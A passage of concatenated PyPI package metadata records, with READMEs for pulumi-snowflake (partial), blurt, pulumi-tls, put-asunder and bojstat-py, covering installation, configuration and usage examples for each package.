* `snowflake:oauthClientSecret` - (optional) Required when `snowflake:oauthRefreshToken` is used. Can be sourced from
`SNOWFLAKE_OAUTH_CLIENT_SECRET` environment variable.
* `snowflake:oauthEndpoint` - (optional) Required when `snowflake:oauthRefreshToken` is used. Can be sourced from
`SNOWFLAKE_OAUTH_ENDPOINT` environment variable.
* `snowflake:oauthRedirectUrl` - (optional) Required when `snowflake:oauthRefreshToken` is used. Can be sourced from
`SNOWFLAKE_OAUTH_REDIRECT_URL` environment variable.
* `snowflake:privateKeyPath` - (optional) Path to a private key for using keypair authentication. Cannot be
used with `snowflake:browserAuth`, `snowflake:oauthAccessToken` or `snowflake:password`. Can be sourced from the
`SNOWFLAKE_PRIVATE_KEY_PATH` environment variable.
* `snowflake:role` - (optional) Snowflake role to use for operations. If left unset, default role for user
will be used. Can come from the `SNOWFLAKE_ROLE` environment variable.
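These configuration points can likewise be set programmatically via an explicit provider instance in a Pulumi program. A hedged sketch in Python (a config fragment, not a runnable program; argument names mirror the `snowflake:*` config keys above and all values are placeholders):

```python
import pulumi
import pulumi_snowflake as snowflake

# Explicit provider instance mirroring the snowflake:account / username /
# region / password configuration keys above.  Values are placeholders;
# keep the password in Pulumi config secrets rather than in source code.
snowflake_provider = snowflake.Provider(
    "my-snowflake",
    account="xy12345",
    username="DEPLOY_USER",
    region="us-west-2",
    password=pulumi.Config("snowflake").require_secret("password"),
)
```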
## Reference
For further information, please visit [the Snowflake provider docs](https://www.pulumi.com/docs/intro/cloud-providers/snowflake)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/snowflake).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, snowflake | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-snowflake"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:58:21.983079 | pulumi_snowflake-2.13.0a1771569954.tar.gz | 1,301,817 | 69/b4/d1d4792ea3337ecafe3342d59faa0deac6a81cb291c84b4f390508e5a4ca/pulumi_snowflake-2.13.0a1771569954.tar.gz | source | sdist | null | false | ce733fca299a80655db946280db8049b | ed479bd3e2efd0588e1d2f80816b7237f03ce2bde78e866b094261adb2b19d94 | 69b4d1d4792ea3337ecafe3342d59faa0deac6a81cb291c84b4f390508e5a4ca | null | [] | 213 |
2.4 | blurt | 0.5.5 | Talk to your coding agents. On-device voice-to-text for macOS Apple Silicon. No cloud, no API keys. | <p align="center">
<pre align="center">
░█▀▄░█░░░█░█░█▀▄░▀█▀
░█▀▄░█░░░█░█░█▀▄░░█░
░▀▀░░▀▀▀░▀▀▀░▀░▀░░▀░
</pre>
<p align="center">Talk to your coding agents.</p>
<p align="center">
<a href="https://pypi.org/project/blurt/"><img src="https://img.shields.io/pypi/v/blurt?color=blue" alt="PyPI"></a>
<a href="https://pepy.tech/project/blurt"><img src="https://img.shields.io/pepy/dt/blurt?color=green" alt="Downloads"></a>
<a href="https://github.com/satyaborg/blurt/blob/main/LICENSE"><img src="https://img.shields.io/github/license/satyaborg/blurt" alt="License"></a>
</p>
</p>
<p align="center">
<img src="https://raw.githubusercontent.com/satyaborg/blurt/main/demo.gif" alt="demo" width="600">
</p>
On-device voice-to-text for macOS. Hold right **⌘**, speak, release - your words go straight into Claude Code, Codex, Cursor, OpenCode or any other agent, wherever your cursor is.
## Install
```bash
pipx install blurt
```
> Requires [pipx](https://pipx.pypa.io/) (`brew install pipx`) and macOS with Apple Silicon.
First run downloads the Whisper model (~1.6 GB, one-time). macOS will prompt for **Microphone** and **Accessibility** access (System Settings → Privacy & Security).
## Usage
| Action | Description |
|---|---|
| Hold right **⌘** | Start recording |
| Release right **⌘** | Stop, transcribe, paste at cursor |
| **Ctrl + C** | Quit |
## Custom Words
Teach Blurt words it gets wrong (names, jargon, acronyms):
```bash
blurt add "Claude Code" # add a word
blurt vocab # list all
blurt rm "Claude Code" # remove
```
Words are stored in `~/.blurt/vocab.txt` (one per line).
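Because the format is just one entry per line, the file is easy to inspect or post-process by hand; a minimal parsing sketch (the sample content is made up):

```python
# Contents of ~/.blurt/vocab.txt: one custom word or phrase per line.
sample = "Claude Code\npipx\n\nOpenCode\n"

# Parse, skipping blank lines.
words = [line.strip() for line in sample.splitlines() if line.strip()]
print(words)  # ['Claude Code', 'pipx', 'OpenCode']
```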
## @-mentions
Run Blurt from a git repo and spoken filenames automatically resolve to `@path/to/file` references that coding agents understand. For example, saying _"check init.py for the bug"_ becomes `check @blurt/__init__.py for the bug`.
## Transcript History
```bash
blurt log # view recent transcripts
```
Logs are stored in `~/.blurt/log.txt`.
## Update
```bash
blurt upgrade
```
## Troubleshooting
| Issue | Fix |
|---|---|
| "Microphone access" prompt doesn't appear | System Settings → Privacy & Security → Microphone → enable your terminal |
| "Accessibility" error | System Settings → Privacy & Security → Accessibility → enable your terminal |
| No audio / recording fails | `brew install portaudio` then restart your terminal |
| Model download stalls | Check disk space (~1.6 GB needed in `~/.cache/huggingface/`) |
## Contributing
```bash
git clone https://github.com/satyaborg/blurt.git
cd blurt
uv pip install -e ".[dev]"
pytest
```
## Privacy
Everything runs on your Mac. No network calls, no telemetry, no data collection. Audio files are saved locally to `~/.blurt/audio/` and never leave your device.
## License
[MIT](LICENSE)
| text/markdown | Satya Borgohain | null | null | null | null | speech-to-text, whisper, mlx, apple-silicon, macos, voice, transcription | [
"Development Status :: 4 - Beta",
"Environment :: MacOS X",
"Intended Audience :: End Users/Desktop",
"Operating System :: MacOS",
"Programming Language :: Python :: 3",
"Topic :: Multimedia :: Sound/Audio :: Speech"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"mlx-whisper",
"sounddevice",
"pynput",
"numpy",
"rich",
"pytest; extra == \"dev\"",
"ruff; extra == \"dev\"",
"pre-commit; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/satyaborg/blurt"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:57:35.397929 | blurt-0.5.5.tar.gz | 1,235,482 | 85/d5/3cc50a3f8ed8b30b0cbbd5a937febba1f876b203174dfbe7483022133377/blurt-0.5.5.tar.gz | source | sdist | null | false | 6f7a2544303c93693c1ce2754dfeae07 | 15525927e340857fd99dd1c240b3c7778b5b28e65f66350d846bdf63cbf73b42 | 85d53cc50a3f8ed8b30b0cbbd5a937febba1f876b203174dfbe7483022133377 | MIT | [
"LICENSE"
] | 238 |
2.4 | pulumi-tls | 5.4.0a1771570098 | A Pulumi package to create TLS resources in Pulumi programs. | [](https://github.com/pulumi/pulumi-tls/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/tls)
[](https://pypi.org/project/pulumi-tls)
[](https://badge.fury.io/nu/pulumi.tls)
[](https://pkg.go.dev/github.com/pulumi/pulumi-tls/sdk/v5/go)
[](https://github.com/pulumi/pulumi-tls/blob/master/LICENSE)
# TLS Resource Provider
The TLS resource provider for Pulumi lets you create TLS keys and certificates in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/tls
or `yarn`:
$ yarn add @pulumi/tls
### Python
To use from Python, install using `pip`:
$ pip install pulumi_tls
### Go
To use from Go, use `go get` to grab the latest version of the library:
$ go get github.com/pulumi/pulumi-tls/sdk/v5
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Tls
## Concepts
The `@pulumi/tls` package provides a strongly-typed means to build cloud applications that create
and interact closely with TLS resources.
## Reference
For further information, please visit [the TLS provider docs](https://www.pulumi.com/docs/intro/cloud-providers/tls) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/tls).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, tls | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-tls"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:56:33.287296 | pulumi_tls-5.4.0a1771570098.tar.gz | 30,572 | 30/03/f36f785036bd20f12ef9909f823fa618c6e56900ae7ea34a5fd863357503/pulumi_tls-5.4.0a1771570098.tar.gz | source | sdist | null | false | 633e2713cfa1fc3262de1f9d62c6f15a | 0d20bf594833c539158fd75da0da7478de8d585fc37d75749c0bf248434ed50f | 3003f36f785036bd20f12ef9909f823fa618c6e56900ae7ea34a5fd863357503 | null | [] | 230 |
2.4 | put-asunder | 0.1.1 | Asunder: Constrained Structure Detection on Undirected Graphs. | # Asunder
Asunder is a Python package for constrained network structure detection (graph clustering) on undirected graphs, with workflows centered on column generation and customizable master/subproblem pipelines. In these workflows, expensive Integer Linear Program (ILP) subproblems are replaced with heuristic clustering algorithms while ensuring that dual information from the master problem is respected. This enables the solution of a wide range of constrained structure detection problems, insofar as a master problem, and any other relevant custom elements, can be properly formulated. See the [problem fit section](#problem-fit) for more detail.
Development of Asunder is led by Andrew Allman's Process Systems Research Team at the University of Michigan.
## Install
Base install:
```bash
pip install put-asunder
```
Optional extras:
```bash
pip install "put-asunder[graph,viz]"
```
Legacy heuristics (best-effort on Python 3.13):
```bash
pip install "put-asunder[legacy]"
```
## Python Support
- Guaranteed: Python 3.10, 3.11, 3.12, 3.13 for core package.
- Guaranteed: mainstream extras (`graph`, `viz`) on Python 3.10–3.13.
- Best-effort: `legacy` extra on Python 3.13.
## Quickstart
```python
import numpy as np
from asunder import CSDDecomposition, CSDDecompositionConfig
A = np.array([
[0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1],
[0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0]
], dtype=float)
cfg = CSDDecompositionConfig(
ifc_params={"generator": lambda N, **_: [np.ones((N, N))], "num": 1, "args": {"N": A.shape[0]}},
extract_dual=False,
final_master_solve=False,
)
result = CSDDecomposition(config=cfg).run(A)
print(result.metadata)
```
## Solver Setup
Asunder accepts user-provided solver objects. For Gurobi, the `GRB_LICENSE_FILE` environment variable is read from your environment. Example:
```python
from asunder import create_solver
solver = create_solver("gurobi_direct")
```
## Problem Fit
Asunder works well out of the box for optimization problems where coordination or operations are coupled across space (e.g., central coupling) and/or time, and those interactions can be represented as a graph over constraints.
Asunder also supports general constrained partitioning beyond these domain examples when requirements can be expressed as must-link and cannot-link constraints.
Typical fit signals:
- coupling across time periods, units, or resources
- mixed discrete-continuous structure with meaningful constraint interactions
- a useful interpretation of must-link/cannot-link or worthy-edge constraints
- value from multilevel partitioning or core-periphery structure detection
Representative domains:
- stochastic design and dispatch in energy systems
- scheduling and resource allocation in healthcare systems
- planning, routing, and location in supply chain and logistics
- network configuration and resource management in telecommunications
For a fuller guide on where default workflows are sufficient vs where customization helps, see `docs/problem_fit.rst`.
## Customization Points
For custom problems, typical extension points are:
1. Initial feasible partition generator.
2. `solve_master_problem` replacement.
3. Optional heuristic or ILP subproblem replacement.
4. Optional partition refinement stage.
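As an illustration of point 1, an initial-partition generator is just a callable returning candidate indicator matrices, mirroring the `ifc_params` generator shown in the quickstart (plain nested lists are used here for a dependency-free sketch; in practice you would return NumPy arrays, and the blocking strategy is invented for illustration):

```python
def block_partition_generator(N, n_blocks=2, **_):
    """Return one candidate partition as an N x N co-membership indicator:
    entry (i, j) is 1.0 when nodes i and j share a block."""
    labels = [i * n_blocks // N for i in range(N)]  # contiguous blocks
    mat = [[1.0 if labels[i] == labels[j] else 0.0 for j in range(N)]
           for i in range(N)]
    return [mat]

(candidate,) = block_partition_generator(5, n_blocks=2)
print([row[:3] for row in candidate[:2]])  # [[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]]
```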
## Constraint Graph Compatibility
For the built-in case-study evaluation workflows (`run_evaluation`), Asunder expects a constraint-graph pattern consistent with the provided case studies.
Required structure for `run_evaluation`-style workflows:
- undirected graph (typically `networkx.Graph`)
- node attribute `constraint` (string tag used for ground-truth and role grouping)
- edge attribute `var_type` with values `"integer"` or `"continuous"`
Commonly present (recommended) attributes:
- node attribute `type` (for example `"constraint"`)
- node attribute `details` (metadata dict)
- edge attributes `weight`, `variables`, `var_types`
How these are used:
- `constraint` identifies core/nonlinear tags in built-in case studies
- `var_type` determines candidate edge sets for CP and CD_Refine paths
If you are not using `run_evaluation` and instead calling decomposition APIs directly, you can work from an adjacency matrix plus explicit `must_link`, `cannot_link`, and optional `worthy_edges`.
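To make the attribute schema concrete, here is a minimal graph fragment using plain dicts as a stand-in for `networkx.Graph` node/edge attributes (the tag values are invented for illustration, not drawn from a real case study):

```python
# Nodes keyed by constraint name, carrying the required `constraint` tag
# plus the recommended `type` and `details` attributes.
nodes = {
    "c1": {"constraint": "core", "type": "constraint", "details": {}},
    "c2": {"constraint": "core", "type": "constraint", "details": {}},
    "c3": {"constraint": "nonlinear", "type": "constraint", "details": {}},
}
# Undirected edges with the required `var_type` attribute
# ("integer" or "continuous") and the recommended `weight`.
edges = [
    ("c1", "c2", {"var_type": "integer", "weight": 1.0}),
    ("c2", "c3", {"var_type": "continuous", "weight": 0.5}),
]
# Sanity-check the schema expected by run_evaluation-style workflows.
assert all("constraint" in attrs for attrs in nodes.values())
assert all(e[2]["var_type"] in ("integer", "continuous") for e in edges)
print("schema ok")
```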
## Examples
- Nonlinear B&P-style decomposition: `examples/nonlinear_bp.py`
- Custom subproblem wiring: `examples/custom_subproblem.py`
## Documentation
Sphinx docs are scaffolded in `docs/` and intended for Read the Docs deployment.
## References
Asunder integrates or wraps methods from:
- networkx
- sklearn
- python-igraph / leidenalg
- scikit-network
- signed-louvain style algorithms
| text/markdown | null | Fortune Adekogbe <fortunea@umich.edu>, Allman Group <allmanaa@umich.edu> | null | null | null | graph, constrained-clustering, graph-clustering, community-detection, core-periphery, column-generation, constrained-network-structure-detection, branch-and-price | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Intended Audience :: Science/Research"
] | [] | null | null | <3.14,>=3.10 | [] | [] | [] | [
"numpy>=1.26",
"scipy>=1.13",
"networkx>=3.2",
"scikit-learn>=1.5",
"scikit-network>=0.33",
"tqdm>=4.66",
"pyomo>=6.8",
"gurobipy>=11.0",
"python-igraph>=0.11; extra == \"graph\"",
"leidenalg>=0.10; extra == \"graph\"",
"matplotlib>=3.8; extra == \"viz\"",
"seaborn>=0.13; extra == \"viz\"",
"cpnet; extra == \"legacy\"",
"sphinx>=7.4; extra == \"docs\"",
"furo>=2024.8.6; extra == \"docs\"",
"myst-parser>=3.0; extra == \"docs\"",
"sphinx-autodoc-typehints>=2.3; extra == \"docs\"",
"pytest>=8.3; extra == \"dev\"",
"pytest-cov>=5.0; extra == \"dev\"",
"ruff>=0.7; extra == \"dev\"",
"mypy>=1.12; extra == \"dev\"",
"pre-commit>=3.8; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/allman-group/asunder",
"Documentation, https://put-asunder.readthedocs.io",
"Repository, https://github.com/allman-group/asunder"
] | twine/6.2.0 CPython/3.11.13 | 2026-02-20T06:55:56.683980 | put_asunder-0.1.1.tar.gz | 55,305 | 38/bb/800bec4270948ff76faf240282e4de96167b41558ea8b9336898563a67e6/put_asunder-0.1.1.tar.gz | source | sdist | null | false | bc83c90277b34bd969993b3cd8b9b480 | b93c262fad1c118fddb5d2bf28cd1d44ffa721841540259b13095f0c4a64ef0b | 38bb800bec4270948ff76faf240282e4de96167b41558ea8b9336898563a67e6 | BSD-3-Clause | [
"LICENSE"
] | 232 |
2.4 | bojstat-py | 0.1.7 | 日本銀行API向けPythonクライアント | # bojstat — 日本銀行 時系列統計データ Python クライアント
[](https://pypi.org/project/bojstat-py/)
[](https://pypi.org/project/bojstat-py/)
[](https://context7.com/youseiushida/bojstat)
[](https://context7.com/youseiushida/bojstat/llms.txt)
**bojstat** is a Python client library for the API of the [Bank of Japan Time-Series Data Search site](https://www.stat-search.boj.or.jp/). It supports all three API types — the code API, the layer API, and the metadata API — and provides sync/async clients, automatic pagination, local caching, retries, and pandas / polars conversion. HTTP communication is handled internally by [httpx](https://github.com/encode/httpx).
[GitHub Repository](https://github.com/youseiushida/bojstat)
[Try it right away on Colab😼](https://colab.research.google.com/drive/1dY9DdZ0pykO6ZCFZhHoxHE-P5T66X4PB?usp=sharing)
## Installation
```sh
pip install bojstat-py
```
Optional dependencies:
```sh
# pandas integration
pip install 'bojstat-py[pandas]'
# polars integration
pip install 'bojstat-py[polars]'
# both pandas and polars
pip install 'bojstat-py[dataframe]'
# CLI (typer + rich + pyarrow)
pip install 'bojstat-py[cli]'
```
## Quickstart
No API key is required. You can start using it right after installation.
```python
from bojstat import BojClient, DB

with BojClient() as client:
    # Fetch the Tankan (CO) business conditions DI
    frame = client.data.get_by_code(
        db=DB.短観,  # DB.CO works the same (短観 is an alias for CO)
        code="TK99F1000601GCQ01000",
        start="202401",
        end="202504",
    )
    for record in frame.records:
        print(record.survey_date, record.value)
```
## Discovering DBs
All 50 DB codes are built into the `DB` enum and a static catalog, so there is no need to consult the API documentation.
```python
from bojstat import list_dbs, get_db_info, DB

# List all DBs
for info in list_dbs():
    print(info)  # "IR01: 基準割引率および基準貸付利率(従来…)の推移"
# Filter by category
for info in list_dbs(category="マーケット"):
    print(info.code, info.name_ja, info.category_ja)
# Info for a single DB
info = get_db_info("FM08")
print(info.name_ja)      # "外国為替市況"
print(info.category_ja)  # "マーケット関連"
# DB is a StrEnum, so it also behaves as a string
print(DB.FM08 == "FM08")  # True
```
## Japanese Aliases
The `DB` enum defines aliases under Japanese names, so you can select a DB by its Japanese name through IDE completion.
```python
from bojstat import DB

# Specify by Japanese name (aliases are the same object)
DB.短観 is DB.CO            # True
DB.外国為替市況 is DB.FM08  # True
# Also works as a string
DB.短観 == "CO"  # True
```
## Discovering Series Codes
Combining the metadata API with the `find()` method lets you discover series codes programmatically.
```python
from bojstat import BojClient, DB

with BojClient() as client:
    meta = client.metadata.get(db=DB.外国為替市況)
    # Filter by series name
    hits = meta.find(name_contains="ドル")
    print(hits.series_codes[:5])  # ['FXERD01', 'FXERD02', ...]
    # Filter by frequency
    daily = meta.find(frequency="DAILY")
    print(len(daily.records))
    # Combined search
    result = meta.find(name_contains="ドル", frequency="DAILY")
    for rec in result.records[:5]:
        print(rec.series_code, rec.series_name)
    # filter() takes an arbitrary predicate
    hits = meta.filter(lambda r: r.category == "外国為替" and r.layer1 == "1")
    print(hits.series_codes)
    # find() and filter() can be chained
    result = meta.find(name_contains="ドル").filter(lambda r: r.unit == "円")
```
## Usage
### Code API
Fetch time-series data by specifying series codes.
```python
from bojstat import BojClient, DB

with BojClient() as client:
    frame = client.data.get_by_code(
        db=DB.外国為替市況,
        code="FXERD01",  # single code (string)
        start="202401",
        end="202412",
    )
    print(frame.meta.status)   # 200
    print(len(frame.records))  # number of records
    for rec in frame.records:
        print(rec.survey_date, rec.value, rec.unit)
```
Fetch multiple series codes at once:
```python
frame = client.data.get_by_code(
    db=DB.外国為替市況,
    code=["FXERD01", "FXERD02"],  # list of codes
    start="202401",
)
```
### Layer API
Fetch time-series data by specifying layer (hierarchy) information.
```python
from bojstat import BojClient, DB

with BojClient() as client:
    frame = client.data.get_by_layer(
        db=DB.国際収支統計,
        frequency="M",    # monthly
        layer=[1, 1, 1],  # layer1=1, layer2=1, layer3=1
        start="202504",
        end="202509",
    )
    for rec in frame.records:
        print(rec.series_code, rec.survey_date, rec.value)
```
Wildcard selection:
```python
frame = client.data.get_by_layer(
    db=DB.資金循環,
    frequency="Q",
    layer="*",  # all layers
)
```
### Metadata API
Fetch metadata (series code, name, frequency, layers, coverage period, and so on) for every series in a DB.
```python
from bojstat import BojClient, DB

with BojClient() as client:
    meta = client.metadata.get(db=DB.IR01)
    # All series codes
    print(meta.series_codes)
    # First 5 records
    for rec in meta.head(5).records:
        print(rec.series_code, rec.series_name, rec.frequency)
```
## Async Client
Just import `AsyncBojClient` and add `await` — the API is identical to the sync version.
```python
import asyncio
from bojstat import AsyncBojClient, DB

async def main():
    async with AsyncBojClient() as client:
        frame = await client.data.get_by_code(
            db=DB.短観,
            code="TK99F1000601GCQ01000",
            start="202401",
        )
        print(len(frame.records))

asyncio.run(main())
```
## pandas / polars Conversion
### pandas
```python
from bojstat import BojClient, DB

with BojClient() as client:
    frame = client.data.get_by_code(
        db=DB.外国為替市況,
        code="FXERD01",
        start="202401",
    )
    df = frame.to_pandas()
    print(df[["survey_date", "value"]].head())
```
### polars
```python
df = frame.to_polars()
print(df.select(["survey_date", "value"]).head())
```
### Converting Metadata to a DataFrame
```python
meta = client.metadata.get(db=DB.外国為替市況)
df = meta.to_pandas()  # or meta.to_polars()
print(df.columns.tolist())
```
### Output Formats
Time-series data can be converted to a list of dicts (long format) with `to_long()`, or pivoted with `to_wide()`.
```python
# long format (default: float64)
rows = frame.to_long()
# preserve Decimal precision
rows = frame.to_long(numeric_mode="decimal")
# wide format (series_code becomes the column name)
pivot = frame.to_wide()
```
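For illustration, a minimal stdlib sketch of what long-to-wide pivoting means (the record shapes and values here are assumptions for the example, not bojstat's exact output):

```python
# Hypothetical long-format rows: one dict per (series, date) observation.
long_rows = [
    {"series_code": "FXERD01", "survey_date": "202401", "value": 148.0},
    {"series_code": "FXERD02", "survey_date": "202401", "value": 161.5},
    {"series_code": "FXERD01", "survey_date": "202402", "value": 150.2},
]

# Pivot to wide format: one row per date, one column per series code.
wide = {}
for row in long_rows:
    wide.setdefault(row["survey_date"], {})[row["series_code"]] = row["value"]

print(wide["202401"])  # {'FXERD01': 148.0, 'FXERD02': 161.5}
```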
## Automatic Pagination
The BOJ API limits each request to 250 series / 60,000 records. bojstat handles this automatically, following `NEXTPOSITION` to fetch all data transparently.
```python
# Layer API: auto_paginate=True (default) fetches every page automatically
frame = client.data.get_by_layer(
    db=DB.FF,
    frequency="Q",
    layer="*",
)
# frame.records now holds all records
```
If you need manual pagination:
```python
frame = client.data.get_by_layer(
    db=DB.資金循環,
    frequency="Q",
    layer="*",
    auto_paginate=False,  # fetch a single page only
)
print(frame.meta.next_position)  # next start position (None if complete)
```
## Caching
Specifying `cache_dir` enables a local file cache. Within the TTL (default: 24 hours), responses are served from the cache without calling the API.
```python
from bojstat import BojClient, CacheMode

client = BojClient(
    cache_dir="./cache",     # cache directory
    cache_ttl=60 * 60 * 12,  # 12 hours
)
# Change the cache mode
client = BojClient(
    cache_dir="./cache",
    cache_mode=CacheMode.FORCE_REFRESH,  # always re-fetch
)
# Disable caching
client = BojClient(
    cache_mode=CacheMode.OFF,
)
```
## Error Handling
API and transport errors are raised as type-specific exception classes, all of which inherit from `BojError`.
```python
import bojstat
from bojstat import BojClient

with BojClient() as client:
    try:
        frame = client.data.get_by_code(db="INVALID", code="XXX")
    except bojstat.BojBadRequestError as e:
        # STATUS=400 (invalid parameters)
        print(e.status, e.message_id, e.message)
    except bojstat.BojServerError as e:
        # STATUS=500 (server error)
        print(e.status, e.message)
    except bojstat.BojUnavailableError as e:
        # STATUS=503 (DB access error)
        print(e.status, e.message)
    except bojstat.BojTransportError as e:
        # network connection error / timeout
        print(e)
    except bojstat.BojValidationError as e:
        # pre-request validation error
        print(e.validation_code, e)
```
Exception reference:
| STATUS | Exception class | Description |
|:---|:---|:---|
| 400 | `BojBadRequestError` | Invalid parameters |
| 500 | `BojServerError` | Unexpected error |
| 503 | `BojUnavailableError` | DB access error |
| — | `BojGatewayError` | Non-JSON response from upstream gateway |
| — | `BojTransportError` | Network connection / timeout |
| — | `BojValidationError` | Pre-request validation |
| — | `BojDateParseError` | DATE parsing failure |
| — | `BojConsistencyError` | Consistency check failure |
| — | `BojPaginationStalledError` | Stalled pagination |
| — | `BojResumeTokenMismatchError` | Resume-token mismatch |
### Error Classification
The `MESSAGEID` can be mapped to a semantic error category.
```python
from bojstat import BojClient

with BojClient() as client:
    result = client.errors.classify(status=400, message_id="M181005E")
    print(result.category)    # "invalid_db"
    print(result.confidence)  # 1.0
```
## Retries
Transport errors (timeouts, connection failures) and STATUS 429/500/503 responses are retried automatically with exponential backoff (default: up to 5 attempts).
```python
from bojstat import BojClient

# Customize the retry settings
client = BojClient(
    retry_max_attempts=3,  # max attempts (default: 5)
    retry_base_delay=1.0,  # backoff base seconds (default: 0.5)
    retry_cap_delay=16.0,  # backoff cap seconds (default: 8.0)
)
# Disable retries
client = BojClient(retry_max_attempts=1)
```
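A capped exponential backoff schedule is commonly computed as `min(cap, base * 2**attempt)`; a minimal sketch with the defaults above (the formula is an assumption for illustration — bojstat's exact schedule and any jitter are not specified here):

```python
def backoff_delays(max_attempts=5, base=0.5, cap=8.0):
    """Delay before each retry: exponential growth, capped at `cap` seconds."""
    return [min(cap, base * 2 ** i) for i in range(max_attempts - 1)]

print(backoff_delays())  # [0.5, 1.0, 2.0, 4.0]
```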
## Rate Limiting
To avoid connection cutoff from high-frequency access, a rate limit of 1 request per second is applied by default.
```python
client = BojClient(
    rate_limit_per_sec=0.5,  # one request every 2 seconds
)
```
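Conceptually, a `rate_limit_per_sec` of *r* enforces a minimum interval of `1 / r` seconds between requests; a minimal stdlib sketch of such a limiter (an illustration, not bojstat's internal implementation):

```python
import time

class MinIntervalLimiter:
    """Enforce a minimum spacing of 1/rate seconds between calls."""

    def __init__(self, rate_per_sec: float):
        self.interval = 1.0 / rate_per_sec
        self.last = float("-inf")  # first call never waits

    def wait(self):
        now = time.monotonic()
        remaining = self.interval - (now - self.last)
        if remaining > 0:
            time.sleep(remaining)
        self.last = time.monotonic()

limiter = MinIntervalLimiter(rate_per_sec=10)  # at most 10 calls/sec
start = time.monotonic()
for _ in range(3):
    limiter.wait()
elapsed = time.monotonic() - start
print(elapsed >= 0.2)  # two enforced 0.1 s gaps -> True
```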
## Timeouts
The default timeout is 30 seconds.
```python
from bojstat import BojClient

client = BojClient(timeout=60.0)  # raise to 60 seconds
```
## Language and Output Format
```python
from bojstat import BojClient, Lang, Format

# English + JSON (default: Japanese + JSON)
client = BojClient(lang=Lang.EN, format=Format.JSON)
# Per-request override is also possible
frame = client.data.get_by_code(
    db="FM08",
    code="FXERD01",
    lang="en",  # English for this request only
)
```
## CLI
Installing `bojstat-py[cli]` lets you fetch data directly from the command line.
```sh
# Save metadata as JSON
bojstat metadata --db FM08 --out meta.json
# Fetch via the code API and save as CSV
bojstat code --db CO --code TK99F1000601GCQ01000 --start 202401 --out data.csv
# Fetch via the layer API and save as Parquet
bojstat layer --db BP01 --frequency M --layer "1,1,1" --start 202504 --out data.parquet
```
## Customizing the HTTP Client
You can configure or replace the underlying [httpx](https://www.python-httpx.org/) client directly.
```python
import httpx
from bojstat import BojClient

# Via a proxy
client = BojClient(proxy="http://my.proxy:8080")
# Enable HTTP/2 (requires pip install 'httpx[http2]')
client = BojClient(http2=True)
# Inject an external httpx.Client
http_client = httpx.Client(
    base_url="https://www.stat-search.boj.or.jp/api/v1",
    timeout=60.0,
)
client = BojClient(http_client=http_client)
```
## Managing HTTP Resources
Release HTTP connections by calling `close()` or by using the context manager.
```python
from bojstat import BojClient

# Context manager (recommended)
with BojClient() as client:
    frame = client.data.get_by_code(db="CO", code="TK99F1000601GCQ01000")

# Manual close
client = BojClient()
try:
    frame = client.data.get_by_code(db="CO", code="TK99F1000601GCQ01000")
finally:
    client.close()
```
Async version:
```python
async with AsyncBojClient() as client:
    ...
# or
client = AsyncBojClient()
try:
    ...
finally:
    await client.aclose()
```
## Advanced Settings
### Consistency Mode
Controls the behavior when server-side data is updated during a long paginated fetch.
```python
from bojstat import BojClient, ConsistencyMode

# strict: raise on detected inconsistency (default)
client = BojClient(consistency_mode=ConsistencyMode.STRICT)
# best_effort: downgrade to a warning and continue
client = BojClient(consistency_mode=ConsistencyMode.BEST_EFFORT)
```
### Automatic Code Splitting
Requests with more than 250 series codes are automatically split into chunks.
```python
client = BojClient(
    strict_api=False,       # disable strict mode
    auto_split_codes=True,  # enable automatic splitting
)
# You can now pass more than 250 codes at once
frame = client.data.get_by_code(
    db="FF",
    code=large_code_list,  # even 500+ codes is fine
)
```
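The chunking itself is simple — a sketch of splitting a code list into API-sized batches (250 is the documented per-request cap; the function name is illustrative, not bojstat's API):

```python
def chunk_codes(codes, size=250):
    """Split a list of series codes into batches of at most `size`."""
    return [codes[i:i + size] for i in range(0, len(codes), size)]

batches = chunk_codes([f"CODE{i:04d}" for i in range(600)])
print([len(b) for b in batches])  # [250, 250, 100]
```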
### Response Metadata
